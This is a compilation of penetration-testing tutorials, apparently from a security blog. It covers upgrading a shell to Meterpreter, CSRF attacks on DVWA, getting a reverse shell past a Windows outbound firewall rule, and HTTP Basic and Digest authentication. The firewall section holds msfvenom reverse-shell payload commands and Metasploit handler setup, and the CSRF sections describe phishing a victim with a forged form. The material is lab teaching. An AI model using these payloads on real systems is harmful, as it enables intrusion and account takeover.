How to Upgrade Shell to Meterpreter

In network penetration testing, we always wish to hack a system of an internal network and try to make unauthorized access through a meterpreter session using the Metasploit framework.  But there are some exploits which will directly provide victim’s command shell instead of meterpreter session. In this article, we have tried to upgrade from the victim’s shell to a meterpreter shell.

Now once we have access to victims command shell then follow the steps given below to upgrade a command shell into the meterpreter shell.

Here I already have access to command shell of victim’s PC

So now we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Execute the following command for session manipulation.

Other Way

This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected.

use post/multi/manage/shell_to_meterpreter

msf post(shell_to_meterpreter) > set session 1

msf post(shell_to_meterpreter) > exploit

Bypass CSRF Medium Security in DVWA

In previous article we have discussed about how to bypass low level security if a web application server is suffering from cross site request forgery (CSRF). Today we will see how to exploit a web application server with CSRF attack if the security level get increased or say set to medium and try to change the password of admin without his permission.

Let’s start!!!

Again I have target DVWA for this tutorial and by default the credential set for it is admin: password. As you can see I have used them for login in DVWA

Set security level medium select the bug cross site request forgery as current vulnerability.  Here you see the text fields are given for changing the password of the database for user admin.

If you remembered in the previous article we have executed csrf.html file to change the password for admin when security level is low.

In following screenshot you can see I have given value= “hacker” as new password and confirm password.

Now I am going to test whether the same file csrf.html would be capable to change the password for admin when security level is medium. From screenshot you can see I try to execute csrf.html file which might reset the password.

As result you can see I didn’t successes to bypass medium security using csrf.html and got an error message “that request didn’t look correct”. Hence the technique which we have used in low security will get failed in medium security level.

Sometimes it might be possible that a web application server may have more than one vulnerabilities in it. It could be a big advantage because making use of other vulnerability we can perform an action to execute our malicious file through it.

 Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

 Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

Now browse the path 192.168.1.102:81/dvwa/hackable/uploads/csrf.php in URL to execute csrf.php file and click on change button.

GREAT!!!

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass medium security in DVWA.

How to set and Bypass Outbound Rule in Windows Firewall using Metasploit

In previous the firewall penetration testing article you might have read how firewall is used for blocking any particular port in a network to prevent hackers or malicious software from gaining access to your PC. This article is written to describe that how an attacker can bypass firewall rules and try to make unauthorized access of victim’s PC.

Target: windows PC

Attacker: Kali Linux

Lets start!!!

Open window firewall control panel and select Advance setting to configure firewall rules as shown in screenshot.

Go to outbound rules to configure new rule for firewall to add security layer in network to secure it form attackers.

Select the type of firewall rule to be created click radio button for option Port that controls connections for a TCP and UDP port then click on next.

Now specify the protocol and port to which rule is applies therefore I choose TCP and then specify port 4444 on which this rule will applies and then click on next.

 Select radio button for block the connection when connection matches to the condition specified condition.

Select all check boxes when this rule applies.

Here give the name to your own specified rule.  You can see in the screenshot I had named it block port 4444 and then click on finished.

Here you can see the new outbound rule is added into the list of outbound rules. Hence victim has defense himself from establishing connection with port 4444, now if attacker try to connect with victim through port 4444 then it might be possible that attacker doesn’t receive any reverse connection.

Now let’s examine when an attacker tries to send malicious file using port 4444, will it work or not. Does attacker able to receive reverse connection of victim’s pc?

Here I have generated a malicious file using msfvenom in the format of .exe file and then send this 4444.exe file to victim and start multi handler at background.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f exe > /root/Desktop/4444.exe

Now let’s find whether we will succeed or get failed to achieve reverse connection of victims PC.

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.102

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

OOPS!!!  No response

It means we get failed in establishing connection between victim and attacker. Now as we know victim has protected himself from connecting with port 4444.

Now whenever you face such type of restriction for establishing connection with victim then do not get disappoint think twice what is the aim of an attack? He only wants to trap victim and want to establish a connection.

Now send your malicious file on those ports which always left open for incoming and outgoing connection.  For example port 80, port 443, port 445 and etc.

When again an attacker tries to send malicious file using port 443. Does attacker able to receive reverse connection of victim’s pc?

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.102 lport=443 -f exe > /root/Desktop/443.exe

 Start multi handler and send 443.exe to victim.

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_http

msf exploit(handler) > set lhost 192.168.1.102

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

GREAT!!!  Attack is successful

We successfully got meterpreter session of victim’s PC inside the metasploit framework.

CSRF Tutorial For Begineers in DVWA

in this article you will learn Cross-site request forgery attack. For CSRF tutorial I have targeted DVWA and try to bypass low security level.

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information.

Reference: en.wikipedia.org/wiki/Cross-site_request_forgery

Let’s start!!!

By default the credential set for DVWA is admin: password. As you can see I have used them for login in DVWA.

Now set security level at low and select the bug cross site request forgery as current vulnerability.  Here you see the text fields are given for changing the password of the database for user admin.

 Now open the view source page and copy the highlighted text. 

Then paste above copied HTML code inside a text file.  If you are aware of HTML coding then it will be very to understand the following syntax inside the notepad which will create a form to reset the password of a web page. Now save the file as csrf.html

Now when you will open the csrf.html file it will look like the given below image where it contains the text field for password and a submit button.

Now again open csrf.html with notepad to edit the value inside the text field given for new password and confirm password. In following screenshot you can see I have given value= “hacker” as new password and confirm password. Then again save it with csrf.html

Now when again you will open csrf.html file you will find that the blank text field are given for password is get filled.

Now when you will click on change button the password will reset for that web page. This is all about how html form will work and from given screenshot you can read the sent GET request for changing password through URL. 

 Since this tutorial is related to bypass low security in DVWA therefore we need to add target location inside the html form to make CSRF attack for changing the password for admin without his permission.

Now copy the URL as shown in the following image.

Again open csrf.html with notepad and replace # from above copied URL which will directly change the password of targeted location for user admin.

Here you can read the final syntax for html form to change the password for admin inside DVWA without his involvement.  Now send this crsf.html file to victim using social engineering or phishing technique to trap the victim for exploiting with CSRF attack.

                                                New password:

                                                

                                                Confirm new password:

                                                

                                               

                                                

When victim will open the csrf.html file and click on change button the password will get changed for admin inside DVWA.

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass low security in DVWA.

Understanding HTTP Authentication Basic and Digest

HTTP authentication uses methodologies via which web servers and browsers securily exchanges the credentials like user names and passwords. Http authentication or we can also call it as Digest Authentication follows the predefined methods / standards which use encoding techniques and MD5 cryptographic hashing over HTTP protocol.

In this article we are covering the methodologies/standards used for Http Authentication.

For the sake of understanding we will be using our php scripts that will simply capture user name and passwords and we will generate the Authorization value as per the standards.

For http codes visit here

Basic Access Authentication using Base 64 Encoding

In basic Authentication we will be using base 64 encoding for generating our cryptographic string which contains the information of username and password. Please note we can use any of the encoding techniques like URL, Hexadecimal, or any other we want.

The below example illustrates the concept, we are using Burpsuite for capturing and illustrating the request.

The webpage is asking for input from the client

We are providing "hackingarticles" as User Name and "ignite" as password.

Syntax of basic Authentication

 Value = username:password

Encoded Value =  base64(Value)

Authorization Value = Basic  

In basic authentication username and password are combined into a single string using a colon in between.

Value =  hackingarticles:ignite

This string is then encoded using base 64 encoding.

Encoded Value = base64 encoded value of hackingarticles:ignite which is aGFja2luZ2FydGljbGVzOmlnbml0ZQ==

Finally the Authorization Value is obtained by putting the text "Basic" followed by before the encoded value. (We can capture the request using burpsuite to see the result)

The Authorization Value for this example is "Basic aGFja2luZ2FydGljbGVzOmlnbml0ZQ==" . This is the value which is sent to the server.  

Finally the server is decrypting the authorization value and returning the entered credentials

Basic Authentication is less secure way because here we are only using encoding and the authorization value can be decoded, In order to enhance the security we have other standards discussed further.

RFC 2069 Digest Access Authentication

Digest Access Authentication uses the hashing methodologies to generate the cryptographic result. Here the final value is sent as a response value.

RFC 2069 authentication is now outdated now and RFC2617 which is enhanced version of RFC2069 is being used. 

For the sake of understanding the syntax of RFC 2069 is explained below.

Syntax of RFC2069

Hash1=MD5(username:realm:password)

Hash2=MD5(method:digestURI)

response=MD5(Hash1:nonce:Hash2)

Hash1 contains the MD5 hash value of (username:realm:password) where realm is any string

provided by server and username and passwords are the input provided by client.

Hash2 contains the MD5 hash value of (method:digestURI) where method could be get or post depending on the page request and digestURI is the URL of the page where the request is being sent. 

response is the final string which is being sent to the server  and contains the MD5 hash value of (hash1:nounce:hash2) where hash1 and hash2 are generated above and nonce is an arbitrary string that could be used only one time provided by server to the client.

RFC 2617 Digest Access Authentication

RFC 2617 digest authentication also uses MD5 hashing algorithm but the final hash value is generated with some additional parameters

Syntax of RFC2617

Hash1=MD5(username:realm:password)

Hash2=MD5(method:digestURI)

response=MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)

Hash1 contains the MD5 hash value of (username:realm:password) where realm is any string

Provided by server and username and passwords are the input provided by client.

Hash2 contains the MD5 hash value of (method:digestURI) where method could be get or post depending on the page request and digestURI is the URL of the page where the request is being sent. 

response is the final string which is being sent to the server  and contains the MD5 hash value of (Hash1:nonce:nonceCount:cnonce:qop:Hash2) where Hash1 and Hash2 are generated above

and for more details on other parameters refer " https://technet.microsoft.com/en-us/library/cc780170(v=ws.10).aspx"

The actual working of RFC2617 is described below

The webpage is asking for input from the client

We are providing "guest" as User Name and "guest" as password.

Through burpsuite we are capturing the request so that all the parameters could be captured and we can compare the hash values captured with the hash values that we will generate through any other tool (hash calculator in this case).

We have captured the values for the following parameters

realm="Hacking Articles", nonce="58bac26865505", uri="/auth/02-2617.php", opaque="8d8909139750c6bd277cfe1388314f48", qop=auth, nc=00000001, cnonce="72ae56dde9406045" , response="ac8e3ecd76d33dd482783b8a8b67d8c1",

Hash1 Syntax=MD5(username:realm:password)

hash1 =  md5(guest:Hacking Articles:guest)

The MD5 hash value is calculated as 2c6165332ebd26709360786bafd2cd49

Hash2 Syntax =MD5(method:digestURI)

 Hash2=MD5(GET:/auth/02-2617.php)

MD5 hash value is calculated as b6a6df472ee01a9dbccba5f5e6271ca8

response Syntax =  MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)

response = MD5(2c6165332ebd26709360786bafd2cd49:58bac26865505:00000001:72ae56dde9406045:auth:b6a6df472ee01a9dbccba5f5e6271ca8)

MD5 hash is calculated as  ac8e3ecd76d33dd482783b8a8b67d8c1

Finally the response value obtained through hash calculator is exactly same as that we have captured with burp suit above. 

Finally the server is decrypting the response value and the following is the result